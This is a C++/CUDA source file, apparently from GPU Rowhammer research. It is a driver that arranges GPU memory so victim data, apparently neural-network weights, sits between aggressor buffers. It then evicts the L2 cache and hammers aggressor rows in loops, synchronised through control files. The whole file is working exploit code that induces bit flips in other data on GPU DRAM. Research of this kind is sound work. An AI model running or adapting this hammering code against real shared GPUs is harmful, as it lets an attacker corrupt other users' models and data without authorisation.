#include <atomic>
#include <chrono>
#include <fstream>
#include <rh_impls.cuh>
#include <rh_utils.cuh>
#include <iostream>
#include <numeric>
#include <pthread.h>
#include <stdint.h>
#include <vector>
#include <filesystem>
#include "allocator.cu"

std::string CLI_PREFIX = "(hammer_manual): ";
std::string exploit_file_name = "exploit_control.txt", mem_file_name = "memory_control.txt", model_file_name = "model_control.txt";
const std::filesystem::path exploit_path = exploit_file_name, mem_path = mem_file_name, model_path = model_file_name;

int
main (int argc, char *argv[])
{
  const uint64_t num_victim = std::stoull (argv[2]);
  const uint64_t step = std::stoull (argv[3]);
  const uint64_t it = std::stoull (argv[4]);
  const uint64_t min_rowId = std::stoull (argv[5]);
  const uint64_t max_rowId = std::stoull (argv[6]);
  const uint64_t row_step = std::stoull (argv[7]);
  const uint64_t size = std::stoull (argv[8]);
  const uint64_t n = std::stoull (argv[9]);
  const uint64_t k = std::stoull (argv[10]);
  const uint64_t delay = std::stoull (argv[11]);
  const uint64_t period = std::stoull (argv[12]);
  const uint64_t count_iter = std::stoull (argv[13]);

  std::fstream control_file;
  auto prev_time = std::filesystem::last_write_time(exploit_path);

  /* Left side of Victim Data. Shift this to target different weights. */
  uint8_t *layout = (uint8_t *)my_malloc(size - 2L * 1024 * 1024, 0, 0);
  std::cerr << "layout: " << (void *)layout << '\n';

  /* Create space for partial victim data */
  uint8_t *target_discard = (uint8_t *)my_malloc(2L * 1024 * 1024, 0, 0);
  std::cerr << "target: " << (void *)target_discard << '\n';

  /* Allocate space for aggressors */
  uint8_t *sandwich1 = (uint8_t *)my_malloc(1L * 1024 * 1024 * 1024, 0, 0);
  std::cerr << "sandwich1: " << (void *)sandwich1 << '\n';

  /* Space for other victim data */
  uint8_t *discard = (uint8_t *)my_malloc(10L * 1024 * 1024 * 1024, 0, 0);
  std::cerr << "discard: " << (void *)discard << '\n';

  uint8_t *sandwich2 = (uint8_t *)my_malloc(35L * 1024 * 1024 * 1024 - size, 0, 0);
  std::cerr << "sandwich2: " << (void *)sandwich2 << '\n';

  my_free(target_discard, 2L * 1024 * 1024, 0, 0);
  my_free(discard, 10L * 1024 * 1024 * 1024, 0, 0);

  std::ifstream row_set_file (argv[1]);
  RowList rows = read_row_from_file (row_set_file, layout);
  row_set_file.close ();

  if ((int64_t)(rows.size () - 2 * num_victim - 1) < 0)
    {
      std::cout << CLI_PREFIX << "Error: "
                << "Not enough rows to generate the specified victims."
                << '\n';
      exit (-1);
    }

  /* Treat all rows as victim rows */
  std::vector<uint64_t> all_vics (max_rowId);

  /* Dummy hammer to keep timing consistent, due to device startup time */
  start_simple_hammer (rows, all_vics, 1);
  cudaDeviceSynchronize ();

  /* Running */
  prev_time = std::filesystem::last_write_time(exploit_path);
  std::string action;
  bool ret = false;
  while (true)
  {
    while (std::filesystem::last_write_time(exploit_path) == prev_time)
      usleep(1);
    prev_time = std::filesystem::last_write_time(exploit_path);

    if (ret)
      return 0;
    else
      ret = true;

    std::vector<uint64_t> victims; 
    std::vector<uint64_t> aggressors
        = get_aggressors (rows, min_rowId, num_victim + 1, row_step);

    for (int j = 0; j < count_iter; j++)
      {
        evict_L2cache (sandwich2);
        cudaDeviceSynchronize ();

        /* Start the hammering and measure the time */
        uint64_t time = start_multi_warp_hammer (
            rows, aggressors, it, n, k, aggressors.size (), delay, period);
      }
      evict_L2cache (sandwich2);
      cudaDeviceSynchronize ();
      control_file.open(model_file_name, std::fstream::in | std::fstream::out | std::fstream::trunc);
      control_file.close();
  }
  return 0;
}
